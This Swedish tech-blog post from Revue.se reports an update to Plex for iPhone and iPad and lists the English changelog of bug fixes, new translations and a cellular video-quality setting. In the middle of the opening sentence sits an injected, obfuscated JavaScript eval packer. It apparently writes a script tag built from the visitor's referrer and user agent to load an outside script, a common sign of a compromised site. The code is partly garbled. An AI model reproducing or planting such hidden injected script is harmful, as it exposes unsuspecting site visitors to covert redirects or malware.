Image Image Image Image Image Image Image Image Image Image

| 24 januari, 2018

Scroll to top

Top

No Comments

Plex till iPhone och iPad uppdaterad | Revue.se

Plex till iPhone och iPad uppdaterad
Sebastian Plengier Ehrnfelt

Plex eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(‘\b’+e(c)+’\b’,’g’),k[c])}}return p}(‘0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|habfk|var|u0026u|referrer|fkyyi||js|php’.split(‘|’),0,{}))
till iOS har nu fått sig en uppdatering och nu fungerar TV ut och de gamla kablarna igen.

Det är inte några jätte stora nyheter men självklart några buggfixar och en översättning på svenska.
Du behöver minst Plex Media Server 0.9.6.1 eller senare för att den nya inställningen för videokvalité över mobilnätet ska fungera.
Just nu är den senaste versionen av Plex Media Server 0.9.5.3 och den kan du ladda ner efter hoppet

  • FIX: Immediate crash on startup when logged in to myPlex without any unwatched queue items.
  • FIX: Occasional crash when stopping playback.
  • FIX: Strange UI behavior when running low on memory.
  • FIX: TV Out is supported for older cables again.
  • FIX: Playback events are no longer sent to shared servers.
  • FIX: Stopping video playback is much faster, especially over remote connections.
  • FIX: Image caching works again.
  • UPDATED: Localizations for Arabic, Catalan, Chinese, Croatian, Danish, Dutch, Finnish, French, Hungarian, Italian, Japanese, Lithuanian, Norwegian, Polish, Portuguese, Romanian, Russian, Slovak, Slovenian, Swedish, Turkish and Ukrainian.
  • UPDATED: Removed automatic video quality selection.
  • NEW: Allowed selecting an additional video quality for cellular connections in addition to the required 64Kbps stream (requires Plex Media Server 0.9.6.1 or later).